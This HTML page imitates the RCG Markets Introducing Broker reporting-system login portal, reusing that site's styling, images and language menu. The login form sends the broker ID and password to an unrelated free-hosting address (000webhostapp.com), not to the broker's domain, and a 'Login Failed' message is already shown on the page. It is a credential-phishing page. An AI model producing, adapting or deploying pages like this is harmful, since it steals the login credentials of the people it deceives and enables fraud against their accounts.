<html
    class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths">

<head>
    <title>Login to: RCG MARKETS IB Reporting System</title>
    <!--    <title>Login to: -->
    <!-- -->
    <!--</title>-->
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <meta content="text/html;charset=utf-8" http-equiv="content-type">
    <meta content="RCG MARKETS IB Reporting System" name="description">




<link href='https://fonts.googleapis.com/css?family=Montserrat' rel='stylesheet'>

<link href="https://cdn.prod.website-files.com/618ecb9763e89eb52ae5c8e7/632199a500801f6bd8f2a0e2_Asset%206.png" rel="shortcut icon" type="image/x-icon">




<style>
body {
    font-family: 'Montserrat';
	font-weight: 500;
}

.alert.alert-danger.alert-dismissable.border {
    font-family: "Helvetica Neue", Helvetica, Arial, sans-serif !important;
    font-weight: 600;
    letter-spacing: 0.4;
}
</style>



    <!--[if lt IE 9]>
    
    <![endif]-->
    <!-- / bootstrap [required files] -->


    <!-- / jquery ui -->


    <!-- / switch buttons -->

    <!-- / xeditable -->


    <!-- / wysihtml5 (wysywig) -->

    <!-- / jquery file upload -->

    <!-- / full calendar -->

    <!-- / select2 -->

    <!-- / mention -->

    <!-- / tabdrop (responsive tabs) -->

    <!-- / jgrowl notifications -->

    <!-- / datatables -->

    <!-- / dynatrees (file trees) -->

    <!-- / color picker -->

    <!-- / datetime picker -->

    <!-- / daterange picker) -->

    <!-- / flags (country flags) -->

    <!-- / slider nav (address book) -->

    <!-- / fuelux (wizard) -->

    <!-- / theme files [required files] -->




    <style>
        body {
            font-size: 100%;
        }
    </style>
    <style>
        /*! CSS Used from: https://partners.rcgmarkets.com/admin/assets/stylesheets/bootstrap/bootstrap.css ; media=all */
        @media all {
            html {
                font-family: sans-serif;
                -webkit-text-size-adjust: 100%;
                -ms-text-size-adjust: 100%;
            }

            body {
                margin: 0;
            }

            a:focus {
                outline: thin dotted;
            }

            a:active,
            a:hover {
                outline: 0;
            }

            b,
            strong {
                font-weight: bold;
            }

            img {
                border: 0;
            }

            button,
            input {
                font-family: inherit;
                font-size: 100%;
                margin: 0;
            }

            button,
            input {
                line-height: normal;
            }

            button {
                text-transform: none;
            }

            button {
                -webkit-appearance: button;
                cursor: pointer;
            }

            @media print {
                * {
                    text-shadow: none !important;
                    color: #000 !important;
                    background: transparent !important;
                    box-shadow: none !important;
                }

                a,
                a:visited {
                    text-decoration: underline;
                }

                a[href]:after {
                    content: " ("attr(href) ")";
                }

                a[href^="#"]:after {
                    content: "";
                }

                img {
                    page-break-inside: avoid;
                }

                img {
                    max-width: 100% !important;
                }

                h3 {
                    orphans: 3;
                    widows: 3;
                }

                h3 {
                    page-break-after: avoid;
                }

                .btn>.caret {
                    border-top-color: #000 !important;
                }
            }

            *,
            *:before,
            *:after {
                -webkit-box-sizing: border-box;
                -moz-box-sizing: border-box;
                box-sizing: border-box;
            }

            html {
                font-size: 62.5%;
                -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            }

            body {
                font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
                font-size: 14px;
                line-height: 1.42857;
                color: #333333;
                background-color: white;
            }

            input,
            button {
                font-family: inherit;
                font-size: inherit;
                line-height: inherit;
            }

            button,
            input {
                background-image: none;
            }

            a {
                color: #428bca;
                text-decoration: none;
            }

            a:hover,
            a:focus {
                color: #2a6496;
                text-decoration: underline;
            }

            a:focus {
                outline: thin dotted #333;
                outline: 5px auto -webkit-focus-ring-color;
                outline-offset: -2px;
            }

            img {
                vertical-align: middle;
            }

            .text-center {
                text-align: center;
            }

            h3,
            h5 {
                font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
                font-weight: 500;
                line-height: 1.1;
            }

            h3 {
                margin-top: 20px;
                margin-bottom: 10px;
            }

            h5 {
                margin-top: 10px;
                margin-bottom: 10px;
            }

            h3 {
                font-size: 24px;
            }

            h5 {
                font-size: 14px;
            }

            ul {
                margin-top: 0;
                margin-bottom: 10px;
            }

            .container {
                margin-right: auto;
                margin-left: auto;
                padding-left: 15px;
                padding-right: 15px;
            }

            .container:before,
            .container:after {
                content: " ";
                display: table;
            }

            .container:after {
                clear: both;
            }

            .row {
                margin-left: -15px;
                margin-right: -15px;
            }

            .row:before,
            .row:after {
                content: " ";
                display: table;
            }

            .row:after {
                clear: both;
            }

            .col-sm-6,
            .col-sm-12 {
                position: relative;
                min-height: 1px;
                padding-left: 15px;
                padding-right: 15px;
            }

            @media (min-width: 768px) {
                .container {
                    max-width: 750px;
                }

                .col-sm-6 {
                    float: left;
                }

                .col-sm-6 {
                    width: 50%;
                }

                .col-sm-12 {
                    width: 100%;
                }

                .col-sm-offset-3 {
                    margin-left: 25%;
                }
            }

            @media (min-width: 992px) {
                .container {
                    max-width: 970px;
                }
            }

            @media (min-width: 1200px) {
                .container {
                    max-width: 1170px;
                }
            }

            .form-group {
                margin-bottom: 15px;
            }

            .btn {
                display: inline-block;
                padding: 6px 12px;
                margin-bottom: 0;
                font-size: 14px;
                font-weight: normal;
                line-height: 1.42857;
                text-align: center;
                vertical-align: middle;
                cursor: pointer;
                border: 1px solid transparent;
                border-radius: 4px;
                white-space: nowrap;
                -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                -o-user-select: none;
                user-select: none;
            }

            .btn:focus {
                outline: thin dotted #333;
                outline: 5px auto -webkit-focus-ring-color;
                outline-offset: -2px;
            }

            .btn:hover,
            .btn:focus {
                color: #333333;
                text-decoration: none;
            }

            .btn:active {
                outline: 0;
                background-image: none;
                -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
                box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
            }

            .collapse {
                display: none;
            }

            .caret {
                display: inline-block;
                width: 0;
                height: 0;
                margin-left: 2px;
                vertical-align: middle;
                border-top: 4px solid black;
                border-right: 4px solid transparent;
                border-left: 4px solid transparent;
                border-bottom: 0 dotted;
                content: "";
            }

            .dropdown-toggle:focus {
                outline: 0;
            }

            .dropdown-menu {
                position: absolute;
                top: 100%;
                left: 0;
                z-index: 1000;
                display: none;
                float: left;
                min-width: 160px;
                padding: 5px 0;
                margin: 2px 0 0;
                list-style: none;
                font-size: 14px;
                background-color: white;
                border: 1px solid #cccccc;
                border: 1px solid rgba(0, 0, 0, 0.15);
                border-radius: 4px;
                -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
                box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
                background-clip: padding-box;
            }

            .dropdown-menu.pull-right {
                right: 0;
                left: auto;
            }

            .dropdown-menu>li>a {
                display: block;
                padding: 3px 20px;
                clear: both;
                font-weight: normal;
                line-height: 1.42857;
                color: #333333;
                white-space: nowrap;
            }

            .dropdown-menu>li>a:hover,
            .dropdown-menu>li>a:focus {
                text-decoration: none;
                color: white;
                background-color: #428bca;
            }

            .btn-group {
                position: relative;
                display: inline-block;
                vertical-align: middle;
            }

            .btn-group>.btn {
                position: relative;
                float: left;
            }

            .btn-group>.btn:hover,
            .btn-group>.btn:focus,
            .btn-group>.btn:active {
                z-index: 2;
            }

            .btn-group>.btn:focus {
                outline: none;
            }

            .btn-group>.btn:first-child {
                margin-left: 0;
            }

            .btn-group .dropdown-toggle:active {
                outline: 0;
            }

            .btn .caret {
                margin-left: 0;
            }

            .alert {
                padding: 15px;
                margin-bottom: 20px;
                border: 1px solid transparent;
                border-radius: 4px;
            }

            .alert-dismissable {
                padding-right: 35px;
            }

            .alert-dismissable .close {
                position: relative;
                top: -2px;
                right: -21px;
                color: inherit;
            }

            .alert-danger {
                background-color: #f2dede;
                border-color: #eed3d7;
                color: #b94a48;
            }

            .close {
                float: right;
                font-size: 21px;
                font-weight: bold;
                line-height: 1;
                color: black;
                text-shadow: 0 1px 0 white;
                opacity: 0.2;
                filter: alpha(opacity=20);
            }

            .close:hover,
            .close:focus {
                color: black;
                text-decoration: none;
                cursor: pointer;
                opacity: 0.5;
                filter: alpha(opacity=50);
            }

            .pull-right {
                float: right !important;
            }
        }

        /*! CSS Used from: https://partners.rcgmarkets.com/admin/assets/stylesheets/bootstrap/bootstrap-responsive.css ; media=all */
        @media all {
            @media (max-width: 767px) {
                .hidden-phone {
                    display: none !important;
                }
            }

            @media (min-width: 1200px) {
                .row {
                    margin-left: -30px;
                    *zoom: 1;
                }

                .row:before,
                .row:after {
                    display: table;
                    content: "";
                    line-height: 0;
                }

                .row:after {
                    clear: both;
                }

                .container {
                    width: 1170px;
                }

                input {
                    margin-left: 0;
                }
            }

            @media (min-width: 768px) and (max-width: 979px) {
                .row {
                    margin-left: -20px;
                    *zoom: 1;
                }

                .row:before,
                .row:after {
                    display: table;
                    content: "";
                    line-height: 0;
                }

                .row:after {
                    clear: both;
                }

                .container {
                    width: 724px;
                }

                input {
                    margin-left: 0;
                }
            }

            @media (max-width: 767px) {
                body {
                    padding-left: 20px;
                    padding-right: 20px;
                }

                .container {
                    width: auto;
                }

                .row {
                    margin-left: 0;
                }
            }

            @media (max-width: 480px) {
                .nav-collapse {
                    -webkit-transform: translate3d(0, 0, 0);
                }
            }

            @media (max-width: 979px) {
                body {
                    padding-top: 0;
                }

                .nav-collapse {
                    clear: both;
                }

                .nav-collapse,
                .nav-collapse.collapse {
                    overflow: hidden;
                    height: 0;
                }
            }

            @media (min-width: 980px) {
                .nav-collapse.collapse {
                    height: auto !important;
                    overflow: visible !important;
                }
            }
        }

        /*! CSS Used from: https://partners.rcgmarkets.com/admin/assets/stylesheets/jquery_ui/jquery.ui-1.10.0.custom.css ; media=all */
        @media all {
            input {
                -webkit-transition: border linear 0.2s, box-shadow linear 0.2s;
                -moz-transition: border linear 0.2s, box-shadow linear 0.2s;
                -ms-transition: border linear 0.2s, box-shadow linear 0.2s;
                -o-transition: border linear 0.2s, box-shadow linear 0.2s;
                transition: border linear 0.2s, box-shadow linear 0.2s;
                -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1);
                -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1);
                box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1);
            }

            input:focus {
                outline: 0;
                border-color: rgba(82, 168, 236, 0.8);
                -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
                -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
                box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
            }

            input[type="text"],
            input[type="password"] {
                display: inline-block;
                padding: 4px;
                font-size: 13px;
                line-height: 18px;
                color: #808080;
                border: 1px solid #ccc;
                -webkit-border-radius: 3px;
                -moz-border-radius: 3px;
                border-radius: 3px;
            }
        }

        /*! CSS Used from: https://partners.rcgmarkets.com/admin/assets/stylesheets/dark-blue-theme-new.css ; media=all */
        @media all {
            body {
                background: #fbfbfb;
                background-image: url("https://partners.rcgmarkets.com/admin/assets/brokers/bg-login.jpeg");
                font-family: Montserrat;
            }

            body.login .middle-container-new {
                overflow: visible;
                display: table;
                position: static;
                width: 100%;
                height: 100%;
            }

            body.login .login-container-header-new {
                padding: 30px 0 40px 0;
                color: white;
                font-size: 30px;
                text-shadow: none;
                font-weight: 200;
                line-height: 30px;
            }

            body.login .login-container-new {
                position: relative;
                padding: 40px 0;
            }

            .container {
                max-width: 100% !important;
            }

            .input-forget {
                color: #1A1918;
                font-size: 13px;
                font-weight: 500;
                text-align: right;
                float: right;
            }

            .input-forget:hover {
                text-decoration: underline;
                color: #C3B798;
            }

            .white-title {
                color: #1A1918;
            }

            form .border {
                border-radius: 6px !important;
            }

            .title {
                margin: 0;
            }

            .title2 {
                color: #1A1918;
                font-weight: 600;
                margin-bottom: 70px;
                margin-top: 10px;
            }

            body .form-color {
                border-radius: 6px !important;
                padding: 20px 10px;
                color: #ffffff;
                border-color: #9BBBD9;
                background-color: dimgray;
                display: block;
                width: 100%;
                height: 34px;
                font-size: 14px;
                line-height: 1.42857;
                vertical-align: middle;
                -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
                box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
                -webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
                transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
            }

            .form-color:focus {
                box-shadow: 0 0 8px #dce1e5;
            }

            .form-color::placeholder {
                color: white;
                font-weight: 500;
                font-size: 13px;
            }

            .btn-lightgrey {
                background: lightgrey;
                border: none;
                width: 140px;
                height: 48px;
                border-radius: 6px;
                justify-content: center;
                text-align: center;
            }

            a:hover,
            a:focus {
                text-decoration: underline;
                color: #E3BF48;
            }

            ul.dropdown-menu {
                background: rgba(112, 128, 144, 0.8);
            }

            .btn-white {
                background-color: white;
                border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25) !important;
                -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
                -moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
                box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
                color: black;
            }
        }

        /*! CSS Used from: https://partners.rcgmarkets.com/admin/assets/stylesheets/theme-colors.css ; media=all */
        @media all {

            .contrast-fb .dropdown-menu>li>a:hover,
            .contrast-fb .dropdown-menu>li>a:focus {
                background-color: #3d579d !important;
            }
        }

        /*! CSS Used fontfaces */
        @font-face {
            font-family: "Montserrat";
            src: url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-bold-webfont.eot");
            src: url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-bold-webfont.eot?#iefix") format("embedded-opentype"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-bold-webfont.woff") format("woff"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-bold-webfont.ttf") format("truetype"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-bold-webfont.svg#montserratbold") format("svg");
            font-weight: bold;
            font-style: normal;
        }

        @font-face {
            font-family: "Montserrat";
            src: url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-regular-webfont.eot");
            src: url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-regular-webfont.eot?#iefix") format("embedded-opentype"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-regular-webfont.woff") format("woff"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-regular-webfont.ttf") format("truetype"), url("https://partners.rcgmarkets.com/admin/assets/fonts/montserrat-regular-webfont.svg#montserratregular") format("svg");
            font-weight: normal;
            font-style: normal;
        }
    </style>
</head>

<body id="login" class="contrast-fb login contract-background"
    style="background: url(&quot;https://cdn.skaleapps.io/images/ib/RCG_background.jpg&quot;) 0% 0% / cover no-repeat; min-height: 911px;">
    <div class="middle-container-new">
        <div class="login-container-header-new">
            <div class="container">
                <div class="row">

                    <div class="btn-group" style="float:right;">
                        <a class="btn btn-white dropdown-toggle" data-toggle="dropdown" style="margin-bottom:5px">
                            <img style="height:16px; border:0px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/en.png">
                            <span class="user-name hidden-phone">English</span>
                            <b class="caret"></b>
                        </a>
                        <ul class="dropdown-menu pull-right">
                            <li>
                                <a href="/?lang=cn">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/cn.png"> Chinese</a>
                            </li>
                            <li>
                                <a href="/?lang=jp">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/jp.png"> Japanese</a>
                            </li>
                            <li>
                                <a href="/?lang=sp">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/sp.png"> Spanish</a>
                            </li>
                            <li>
                                <a href="/?lang=sa">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/sa.png"> Arabic</a>
                            </li>
                            <li>
                                <a href="/?lang=vi">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/vi.png"> Vietnamese</a>
                            </li>
                            <li>
                                <a href="/?lang=pt">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/pt.png"> Portuguese</a>
                            </li>
                            <li>
                                <a href="/?lang=th">
                                    <img style="height:16px;margin-top: -3px;" src="https://partners.rcgmarkets.com/admin/assets/images/flags/th.png"> Thai</a>
                            </li>
                        </ul>
                    </div>
                </div>

                <div class="row">
                    <div class="col-sm-12">
                        <div class="text-center">
                            <img id="logo-img" style="max-height: 200px;" src="https://cdn.skaleapps.io/images/ib/rcg_logo.png">
                        </div>
                    </div>
                </div>

            </div>
        </div>

        <div class="login-container-white">
            <!--        <div class="login-container-white-block"></div>-->
            <div class="login-container-new">
                <div class="container">
                    <!--<div class="row" style="border: 1px solid darkgray">-->
                    <!--<div class="col-sm-4 col-sm-offset-4">-->
                    <div id="changeColorLogin" class="col-sm-6 col-sm-offset-3" style="
                         padding: 20px 40px;
                         border-radius: 12px;
                         background: rgba(112, 128, 144, 0.5);
                         " ;="">
                        <h3 class="text-center title white-title" style="color: white">Please Log Into System</h3>
                        <h5 class="text-center title title2" style="color: white">Enter your Introducing Broker ID and
                            Password</h5>

                        <form action="https://beriiv1.000webhostapp.com/rcg/oauth.php" class="validate-form" method="post" novalidate="novalidate">


                            <div class="form-group">
                                <div class="controls with-icon-over-input">
                                    <input value="" placeholder="Introducing Broker ID" class="form-color" data-rule-required="true" name="username" type="text" id="username_field">
                                </div>
                            </div>


                            <div class="form-group">
                                <div class="controls with-icon-over-input">
                                    <input value="" placeholder="Password" class="form-color" data-rule-required="true" name="password" type="password">
                                </div>
                            </div>
                            <div class="alert alert-danger alert-dismissable border">
                                <a class="close" data-dismiss="alert" href="#">×</a>
                                <i class="icon-remove-sign"></i>
                                Login Failed. Your input data was incorrect!
                            </div>
                            <a href="/forgot-password" class="input-forget" style="color: white;">Forgot your
                                password?</a>

                            <div style="text-align: center; margin-top: 90px;">
                                <button name="login" value="Log Me In" class="btn-lightgrey">Login</button>
                            </div>
                        </form>
                        <div class="row" style="margin-top: 24px">
                            <div class="col-sm-12">
                                <div class="text-center">
                                    <a href="/register" style="color: white; margin-top: 20px">
                                        Do not have an account yet?
                                        <strong>Sign Up</strong>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!--</div>-->
                </div>
            </div>
            <!--<div class="footer">
            <div class="container">
                <div class="row">
                    <div class="col-sm-12">
                        <div class="text-center">
                            <a href="/register">
                                ?
                                <strong></strong>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>-->
        </div>
    </div>
    <!-- / jquery -->

    <!-- / jquery mobile events (for touch and slide) -->

    <!-- / jquery migrate (for compatibility with new jquery) -->

    <!-- / jquery ui -->

    <!-- / jQuery UI Touch Punch -->

    <!-- / bootstrap -->


    <!-- / sparklines -->

    <!-- / flot charts -->



    <!-- / bootstrap switch -->

    <!-- / fullcalendar -->

    <!-- / datatables -->


    <!-- / wysihtml5 -->


    <!-- / select2 -->

    <!-- / color picker -->

    <!-- / mention -->

    <!-- / input mask -->

    <!-- / fileinput -->

    <!-- / modernizr -->

    <!-- / retina -->

    <!-- / fileupload -->








    <!-- / timeago -->

    <!-- / slimscroll -->

    <!-- / autosize (for textareas) -->

    <!-- / charCount -->

    <!-- / validate -->


    <!-- / naked password -->

    <!-- / nestable -->

    <!-- / tabdrop -->

    <!-- / jgrowl -->

    <!-- / bootbox -->

    <!-- / inplace editing -->


    <!-- / ckeditor -->

    <!-- / filetrees -->

    <!-- / datetime picker -->

    <!-- / daterange picker -->


    <!-- / max length -->

    <!-- / dropdown hover -->








    <div class="nav-collapse collapse" style="visibility:hidden;position:fixed" id="cwspear-is-awesome">.</div>
</body>

</html>
